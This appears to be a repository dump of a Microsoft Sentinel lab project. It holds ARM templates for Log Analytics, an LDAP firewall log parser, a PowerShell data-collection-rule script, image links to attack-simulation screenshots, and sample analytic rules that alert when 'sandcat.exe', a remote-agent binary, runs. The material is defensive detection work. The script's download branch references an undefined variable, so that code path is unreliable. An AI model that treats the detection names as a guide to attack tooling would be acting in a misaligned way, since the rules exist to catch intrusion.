"[resourceGroup().location]", 20 | "metadata": { 21 | "description": "Location for all resources." 22 | } 23 | } 24 | }, 25 | "resources": [ 26 | { 27 | "type": "Microsoft.OperationsManagement/solutions", 28 | "apiVersion": "2015-11-01-preview", 29 | "name": "[concat('WindowsFirewall','(', parameters('workspaceName'),')')]", 30 | "location": "[parameters('location')]", 31 | "plan": { 32 | "name": "[concat('WindowsFirewall','(', parameters('workspaceName'),')')]", 33 | "promotionCode": "", 34 | "product": "OMSGallery/WindowsFirewall", 35 | "publisher": "Microsoft" 36 | }, 37 | "properties": { 38 | "workspaceResourceId": "[parameters('workspaceId')]", 39 | "containedResources": [] 40 | } 41 | } 42 | ] 43 | } 44 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/additionalSolutions.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "http://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "solutionTypes": { 6 | "defaultValue": [], 7 | "type": "Array", 8 | "metadata": { 9 | "description": "Log Analytics Workspace solutions. Example: [\"VMInsights\"]" 10 | } 11 | }, 12 | "workspaceName": { 13 | "type": "string", 14 | "metadata": { 15 | "description": "Name for the Log Analytics workspace used to aggregate data" 16 | } 17 | }, 18 | "workspaceId": { 19 | "type": "string", 20 | "metadata": { 21 | "description": "Log Analytics workspace ID" 22 | } 23 | }, 24 | "location": { 25 | "defaultValue": "[resourceGroup().location]", 26 | "type": "String" 27 | } 28 | }, 29 | "resources": [ 30 | { 31 | "type": "Microsoft.OperationsManagement/solutions", 32 | "apiVersion": "2015-11-01-preview", 33 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]", 34 | "location": "[parameters('location')]", 35 | "copy": { 36 | "name": "solutionsCopy", 37 | "count": "[length(parameters('solutionTypes'))]" 38 | }, 39 | "properties": { 40 | "workspaceResourceId": "[parameters('workspaceId')]" 41 | }, 42 | "plan": { 43 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]", 44 | "product": "[Concat('OMSGallery/', parameters('solutionTypes')[copyIndex()])]", 45 | "promotionCode": "", 46 | "publisher": "Microsoft" 47 | } 48 | } 49 | ] 50 | } 51 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/iisLogsDataSource.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "location": { 12 | "type": "string", 13 | "defaultValue": "[resourceGroup().location]", 14 | "metadata": { 15 | "description": "Location for all resources." 16 | } 17 | } 18 | }, 19 | "resources": [ 20 | { 21 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 22 | "apiVersion": "2020-08-01", 23 | "location": "[parameters('location')]", 24 | "name": "[concat(parameters('workspaceName'), '/IISLogs')]", 25 | "kind": "IISLogs", 26 | "properties": { 27 | "state": "OnPremiseEnabled" 28 | } 29 | } 30 | ] 31 | } 32 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/syslogDataSources.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "syslogFacilities": { 12 | "type": "array", 13 | "defaultValue": [ 14 | "auth", 15 | "authpriv", 16 | "cron", 17 | "daemon", 18 | "ftp", 19 | "kern", 20 | "user" 21 | ], 22 | "metadata": { 23 | "description": "A list of facilities to collect from Syslog." 24 | } 25 | }, 26 | "location": { 27 | "type": "string", 28 | "defaultValue": "[resourceGroup().location]", 29 | "metadata": { 30 | "description": "Location for all resources." 31 | } 32 | } 33 | }, 34 | "resources": [ 35 | { 36 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 37 | "apiVersion": "2020-08-01", 38 | "location": "[parameters('location')]", 39 | "name": "[concat(parameters('workspaceName'), '/syslog', copyindex())]", 40 | "copy": { 41 | "name": "linuxEventCopy", 42 | "count": "[length(parameters('syslogFacilities'))]" 43 | }, 44 | "kind": "LinuxSyslog", 45 | "properties": { 46 | "sysLogName": "[trim(parameters('syslogFacilities')[copyIndex()])]", 47 | "syslogSeverities": [ 48 | { 49 | "severity": "emerg" 50 | }, 51 | { 52 | "severity": "alert" 53 | }, 54 | { 55 | "severity": "crit" 56 | }, 57 | { 58 | "severity": "err" 59 | }, 60 | { 61 | "severity": "warning" 62 | }, 63 | { 64 | "severity": "notice" 65 | }, 66 | { 67 | "severity": "info" 68 | }, 69 | { 70 | "severity": "debug" 71 | } 72 | ] 73 | } 74 | } 75 | ] 76 | } 77 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/winDataSources.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "winEventProviders": { 12 | "type": "array", 13 | "defaultValue": [ 14 | "System", 15 | "Microsoft-Windows-Sysmon/Operational", 16 | "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational", 17 | "Microsoft-Windows-Bits-Client/Operational", 18 | "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational", 19 | "Directory Service", 20 | "Microsoft-Windows-DNS-Client/Operational", 21 | "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall", 22 | "Windows PowerShell", 23 | "Microsoft-Windows-PowerShell/Operational", 24 | "Microsoft-Windows-WMI-Activity/Operational", 25 | "Microsoft-Windows-TaskScheduler/Operational" 26 | ], 27 | "metadata": { 28 | "description": "A list of Windows Event Providers that you would like to collect. Windows Security Auditing is not enabled through this option. It is enabled through Microsoft Sentinel Data Connectors." 29 | } 30 | }, 31 | "location": { 32 | "type": "string", 33 | "defaultValue": "[resourceGroup().location]", 34 | "metadata": { 35 | "description": "Location for all resources." 36 | } 37 | } 38 | }, 39 | "resources": [ 40 | { 41 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 42 | "apiVersion": "2020-08-01", 43 | "location": "[parameters('location')]", 44 | "name": "[concat(parameters('workspaceName'), '/winEvent', copyindex())]", 45 | "copy": { 46 | "name": "winEventCopy", 47 | "count": "[length(parameters('winEventProviders'))]" 48 | }, 49 | "kind": "WindowsEvent", 50 | "properties": { 51 | "eventLogName": "[trim(parameters('winEventProviders')[copyIndex()])]", 52 | "eventTypes": [ 53 | { 54 | "eventType": "Error" 55 | }, 56 | { 57 | "eventType": "Warning" 58 | }, 59 | { 60 | "eventType": "Information" 61 | } 62 | ] 63 | } 64 | } 65 | ] 66 | } 67 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/parsers/winLDAPFWLogs.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-08-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string" 7 | }, 8 | "location": { 9 | "type": "string" 10 | } 11 | }, 12 | "resources": [ 13 | { 14 | "type": "Microsoft.OperationalInsights/workspaces", 15 | "apiVersion": "2017-03-15-preview", 16 | "name": "[parameters('workspaceName')]", 17 | "location": "[parameters('location')]", 18 | "resources": [ 19 | { 20 | "type": "savedSearches", 21 | "apiVersion": "2020-08-01", 22 | "name": "LDAPFWWMicrosoftWindowsEvent", 23 | "dependsOn": [ 24 | "[concat('Microsoft.OperationalInsights/workspaces/', parameters('workspaceName'))]" 25 | ], 26 | "properties": { 27 | "etag": "*", 28 | "displayName": "Windows LDAP Firewall Parser", 29 | "category": "Security", 30 | "FunctionAlias": "winLDAPFWLogs", 31 | "query": "// KQL LDAPFW parser 32 | // Contributors: Roberto Rodriguez @Cyb3rWard0g MSTIC 33 | // Modifed: 2023/03/24 34 | WindowsEvent 35 | | where Channel == 'LDAPFW' 36 | | where EventID == 263 37 | | extend ParsedEventData = parse_xml(EventData) 38 | | extend user_name = tostring(ParsedEventData.[\"01\"]) 39 | | extend action = tostring(ParsedEventData.[\"02\"]) 40 | | extend base_dn = tostring(ParsedEventData.[\"03\"]) 41 | | extend ldap_filter = tostring(ParsedEventData.[\"04\"]) 42 | | extend scope = tostring(ParsedEventData.[\"05\"]) 43 | | extend attributes = tostring(ParsedEventData.[\"06\"]) 44 | | extend client_network_address = tostring(ParsedEventData.[\"07\"]) 45 | | extend client_port = tostring(ParsedEventData.[\"08\"]) 46 | | project-away EventData, ParsedEventData", 47 | "version": 1 48 | } 49 | } 50 | ] 51 | } 52 | ] 53 | } -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/security-center/winSecurityAuditing.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "workspaceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace ID" 15 | } 16 | }, 17 | "securityCollectionTier": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Tier for gathering Windows Security Events." 21 | } 22 | }, 23 | "location": { 24 | "type": "string", 25 | "metadata": { 26 | "description": "Location for all resources." 27 | } 28 | } 29 | }, 30 | "resources": [ 31 | { 32 | "name": "[concat('Security','(', parameters('workspaceName'),')')]", 33 | "type": "Microsoft.OperationsManagement/solutions", 34 | "apiVersion": "2015-11-01-preview", 35 | "location":"[parameters('location')]", 36 | "properties": { 37 | "workspaceResourceId": "[parameters('workspaceId')]" 38 | }, 39 | "plan": { 40 | "name": "[concat('Security','(', parameters('workspaceName'),')')]", 41 | "product": "OMSGallery/Security", 42 | "publisher": "Microsoft", 43 | "promotionCode": "" 44 | } 45 | }, 46 | { 47 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 48 | "apiVersion": "2015-11-01-preview", 49 | "location": "[parameters('location')]", 50 | "dependsOn": [ 51 | "[resourceId('Microsoft.OperationsManagement/solutions/', concat('Security','(', parameters('workspaceName'),')'))]" 52 | ], 53 | "name": "[concat(parameters('workspaceName'), '/', 'SecurityEventCollectionConfiguration')]", 54 | "kind": "SecurityEventCollectionConfiguration", 55 | "properties": { 56 | "tier": "[parameters('securityCollectionTier')]", 57 | "tierSetMethod": "Custom" 58 | } 59 | } 60 | ] 61 | } 62 | -------------------------------------------------------------------------------- /microsoft-sentinel/scripts/Create-DataCollectionRules.ps1: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPLv3 3 | # Reference: 4 | # https://review.docs.microsoft.com/en-us/azure/sentinel/connect-windows-security-events?branch=pr-en-us-161325&tabs=AMA 5 | # https://docs.microsoft.com/en-us/rest/api/monitor/data-collection-rules/create#knowndatacollectionruleresourcekind 6 | 7 | param( 8 | [Parameter(Mandatory=$true)][string]$WorkspaceId, 9 | [Parameter(Mandatory=$true)][string]$WorkspaceResourceId, 10 | [Parameter(Mandatory=$true)][string]$ResourceGroup, 11 | [Parameter(Mandatory=$false)][ValidateSet('Windows','Linux')][string]$Kind = 'Windows', 12 | [Parameter(Mandatory=$true)][string]$DataCollectionRuleName, 13 | [Parameter(Mandatory=$false)][string]$DestinationLogAnalyticsName = 'WindowsEvents', 14 | [Parameter(Mandatory=$false)][string[]]$DataFlowsStreams = @('Microsoft-SecurityEvent'), 15 | [Parameter(Mandatory=$false)][object]$DataSourcesObject, 16 | [Parameter(Mandatory=$false)][string]$DataSourcesFile, 17 | [Parameter(Mandatory=$true)][string]$Location 18 | ) 19 | 20 | $context = Get-AzContext 21 | 22 | if(!$context){ 23 | Connect-AzAccount 24 | $context = Get-AzContext 25 | } 26 | 27 | $SubscriptionId = $context.Subscription.Id 28 | 29 | Write-host "[+] Connected to Azure with subscription: $($context.Subscription)" 30 | Write-host "[+] Processing XPath Queries.." 31 | if ($DataSourcesFile){ 32 | if (($DataSourcesFile -as [System.URI]).AbsoluteURI) { 33 | Write-host "[+] Downloading Data Sources File.." 34 | # Set Current Directory (PS Session Only) 35 | [Environment]::CurrentDirectory=(Get-Location -PSProvider FileSystem).ProviderPath 36 | # Initializing Web Client 37 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 38 | $OutputFile = Split-Path $XPathQueriesUrl -leaf 39 | # Download Queries 40 | $wc = new-object System.Net.WebClient 41 | $wc.DownloadFile($XPathQueriesUrl, $OutputFile) 42 | $DataSourcesFile = $OutputFile 43 | } 44 | $DataSourcesObject = Get-content -Path .\$DataSourcesFile | ConvertFrom-Json 45 | } 46 | 47 | Write-host "[+] Data Collection Rule: $DataCollectionRuleName" 48 | $ApiUri = "/subscriptions/${SubscriptionId}/resourceGroups/${ResourceGroup}/providers/Microsoft.Insights/dataCollectionRules/${DataCollectionRuleName}?api-version=2019-11-01-preview" 49 | $RuleBody = @{ 50 | location = $location 51 | kind = "$kind" 52 | tags = @{ 53 | createdBy = "Sentinel" 54 | } 55 | properties = @{ 56 | datasources = $DataSourcesObject 57 | destinations = @{ 58 | logAnalytics = @( 59 | @{ 60 | name = "$DestinationLogAnalyticsName" 61 | workspaceId = $WorkspaceId 62 | workspaceResourceId = $WorkspaceResourceId 63 | } 64 | ) 65 | } 66 | dataFlows = @( 67 | @{ 68 | streams = $DataFlowsStreams 69 | destinations = @( 70 | "$DestinationLogAnalyticsName" 71 | ) 72 | } 73 | ) 74 | } 75 | } | ConvertTo-Json -Depth 10 76 | 77 | Write-host "[+] Creating Data Collection Rule: $DataCollectionRuleName" 78 | $stopLoop = $false 79 | [int]$retryCount = 0 80 | do { 81 | try{ 82 | Write-Verbose $RuleBody 83 | $response = Invoke-AzRestMethod -Path $ApiUri -Method PUT -Payload $RuleBody 84 | $responseObject = $response | ConvertTo-Json | ConvertFrom-Json 85 | Write-Verbose $responseObject 86 | $responseCode = $response.StatusCode 87 | if ($responseCode -eq 201 -or $responseCode -eq 200) { 88 | $responseDescription = Switch ($responseCode) { 89 | 200 { 'Rule: OK, Operation successfully completed' } 90 | 201 { 'Rule: Created' } 91 | } 92 | write-host " [+] $DataCollectionRuleName $responseDescription" 93 | $output = $responseObject.Content | ConvertFrom-Json | Select-Object -ExpandProperty id 94 | Write-Output $output 95 | $DeploymentScriptOutputs = @{} 96 | $DeploymentScriptOutputs['text'] = $output 97 | $stopLoop = $true 98 | } 99 | else { throw ($responseObject) } 100 | } 101 | catch { 102 | if ($retryCount -gt 5){ 103 | Write-Verbose $_ 104 | Write-Error "Unable to create data collection rule with error message: $($_.Exception.Message)" -ErrorAction Stop 105 | $stopLoop = $true 106 | } 107 | else { 108 | Write-host "[*] Cound not create data collection rule, retrying in 15 seconds.." 109 | Start-Sleep -seconds 15 110 | $retryCount = $retryCount + 1 111 | } 112 | } 113 | } 114 | while ($stopLoop -eq $false) -------------------------------------------------------------------------------- /resources/images/cef-log-analytics-agent_01_azure_sentinel.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_01_azure_sentinel.PNG -------------------------------------------------------------------------------- /resources/images/cef-log-analytics-agent_02_cef_data_connector.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_02_cef_data_connector.PNG -------------------------------------------------------------------------------- /resources/images/cef-log-analytics-agent_03_sample_cef_event.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_03_sample_cef_event.PNG -------------------------------------------------------------------------------- /resources/images/cef-log-analytics-agent_04_cef_azure_bastion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_04_cef_azure_bastion.png -------------------------------------------------------------------------------- /resources/images/cef-log-analytics-agent_05_custom_cef_event.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_05_custom_cef_event.PNG -------------------------------------------------------------------------------- /resources/images/lab_environment_omigod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/lab_environment_omigod.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-azure-sentinel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-azure-sentinel.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-service-status.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-service-status.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-tail-syslog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-tail-syslog.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-tail-sysmonlogview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-tail-sysmonlogview.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-template-params.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-template-params.png -------------------------------------------------------------------------------- /resources/images/log4jshell-deployment-resources.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-deployment-resources.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-reverseshell-pcap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-reverseshell-pcap.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-reverseshell3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-reverseshell3.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-reverseshell4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-reverseshell4.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-sentinel-file-creation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-sentinel-file-creation.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-sysmon-process-create.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-sysmon-process-create.png -------------------------------------------------------------------------------- /resources/images/log4jshell-validate-sysmon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-validate-sysmon.png -------------------------------------------------------------------------------- /resources/images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/logo.png -------------------------------------------------------------------------------- /resources/images/logo2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/logo2.png -------------------------------------------------------------------------------- /resources/images/oms_scx_verbose_logging.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/oms_scx_verbose_logging.png -------------------------------------------------------------------------------- /resources/images/sysmon-azure-sentinel-query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/sysmon-azure-sentinel-query.png -------------------------------------------------------------------------------- /resources/images/sysmon-azure-sentinel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/sysmon-azure-sentinel.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_01_exchange_admin_center_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_01_exchange_admin_center_login.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_03_owa_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_03_owa_login.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_04_owa_inbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_04_owa_inbox.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_05_owa_new_message.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_05_owa_new_message.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_06_owa_message_received.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_06_owa_message_received.png -------------------------------------------------------------------------------- /resources/images/win10-ldapfw_check_events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ldapfw_check_events.png -------------------------------------------------------------------------------- /resources/images/win10-ldapfw_query_ldap_firewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ldapfw_query_ldap_firewall.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_block_replication.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_block_replication.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_block_replication_event.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_block_replication_event.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_check_events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_check_events.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_check_mssentinel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_check_mssentinel.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_forwarded_events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_forwarded_events.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_mk_dcsync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_mk_dcsync.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_mk_dcsync_execution.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_mk_dcsync_execution.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_query_rpcfirewall_limit10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_query_rpcfirewall_limit10.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_query_rpcfirewall_where_replication.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_query_rpcfirewall_where_replication.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_update_rules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_update_rules.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_windows_subscriptions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_windows_subscriptions.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_windows_subscriptions_queries.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_windows_subscriptions_queries.png -------------------------------------------------------------------------------- /resources/samples/analytic-rules/sandcats.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "kind": "Scheduled", 4 | "properties": { 5 | "alertRuleTemplateName": null, 6 | "description": "Basic internal rule to detect binary named sandcat.exe", 7 | "displayName": "Sandcat Execution", 8 | "enabled": true, 9 | "incidentConfiguration": { 10 | "createIncident": true, 11 | "groupingConfiguration": { 12 | "enabled": false, 13 | "entitiesMatchingMethod": "All", 14 | "groupByEntities": [], 15 | "lookbackDuration": "PT5H", 16 | "reopenClosedIncident": false 17 | } 18 | }, 19 | "query": "SecurityEvent | where EventID == \"4688\" and CommandLine contains \"sandcat.exe\"", 20 | "queryFrequency": "PT5M", 21 | "queryPeriod": "PT5M", 22 | "queryResultsAggregationSettings": { 23 | "aggregationKind": "SingleAlert" 24 | }, 25 | "severity": "High", 26 | "suppressionDuration": "PT5H", 27 | "suppressionEnabled": false, 28 | "tactics": [ 29 | "Execution" 30 | ], 31 | "triggerOperator": "Equal", 32 | "triggerThreshold": 1 33 | } 34 | }, 35 | { 36 | "kind": "Scheduled", 37 | "properties": { 38 | "alertRuleTemplateName": null, 39 | "description": "Basic internal rule to detect binary named sandcat.exe", 40 | "displayName": "Sandcat Network", 41 | "enabled": true, 42 | "incidentConfiguration": { 43 | "createIncident": true, 44 | "groupingConfiguration": { 45 | "enabled": false, 46 | "entitiesMatchingMethod": "All", 47 | "groupByEntities": [], 48 | "lookbackDuration": "PT5H", 49 | "reopenClosedIncident": false 50 | } 51 | }, 52 | "query": "AzureDiagnostics | where EventID == \"4688\" and CommandLine contains \"sandcat.exe\"", 53 | "queryFrequency": "PT5M", 54 | "queryPeriod": "PT5M", 55 | "queryResultsAggregationSettings": { 56 | "aggregationKind": "SingleAlert" 57 | }, 58 | "severity": "High", 59 | "suppressionDuration": "PT5H", 60 | "suppressionEnabled": false, 61 | "tactics": [ 62 | "Execution" 63 | ], 64 | "triggerOperator": "Equal", 65 | 